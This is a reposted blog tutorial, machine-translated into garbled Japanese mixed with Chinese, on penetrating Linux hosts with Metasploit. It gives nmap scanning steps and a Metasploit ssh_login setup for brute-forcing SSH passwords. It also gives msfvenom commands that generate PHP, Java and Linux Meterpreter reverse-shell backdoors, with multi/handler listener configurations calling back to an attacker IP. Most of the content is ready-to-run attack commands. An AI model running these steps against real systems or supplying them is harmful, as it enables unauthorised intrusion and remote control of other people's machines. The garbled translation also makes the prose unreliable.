Metasploitの浸透バックドアLinuxシステムおよびクロスプラットフォームのバックドア世代

Metasploitの浸透バックドアLinuxシステムおよびクロスプラットフォームのバックドア世代

TOC

ターゲットホストのSSHブラストに1.Metasploit

1.原理:ドローンルート・ユーザは、ターゲットホストのSSHサービスをクラックする列挙法を使用して、弱いパスワード抜け穴が存在します

1.1ブラスト処理

:1.内部LANの生存ホストれていることを確認しnmap -sP 192.168.73.0/24無人偵察機がIPを取得します。

2.スキャンドローン・オペレーティング・システム:nmap -O 192.168.73.128;ドローンオペレーティングシステムとバージョン番号を取得します

オープンポートおよびアプリケーション3スキャンドローンバージョン番号:nmap -sV -Pn 192.168.73.128; 22個のポートは、そのアプリケーションがSSHで、オープン見出さ

4.オープンMetasploitのツール、使用MSF ssh_loginモジュールドローンSSHブルートフォースパスワード:use auxiliary/scanner/ssh/ssh_login;モジュールの入力show options設定を

5.ユーザー名とパスワード辞書の辞書を設定します(特定の番号を設定するには、ブラスト時間、ユーザー名とパスワードを低減するために)

  • USER.TXTpass.txtカーリーLinuxで指定したディレクトリにファイル

6. SSHバーストする準備ができて:ユーザー名とパスワード辞書辞書へのパスを設定し、設定された糸50;ドローンのIPアドレスを設定し、実行を開始

  • 後に示されていない、利用; VERBOSEを設定trueします

7.待ちのsshブラストを終了します

8.開始リンク

2.PHPバックドア世代

1.例の説明:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php

  • LHOST:IPの攻撃
  • PHPバックドアコード

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

  • php后门使用

3.JAVA后门生成

1.示例指令

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

  • java后门使用

4.LINUX后门生成

1.示例指令:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

  • linux后门使用

参考文档

2019-08-28 14:27:50 星期三

<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">





おすすめ

転載: www.cnblogs.com/Get-Me/p/11423924.html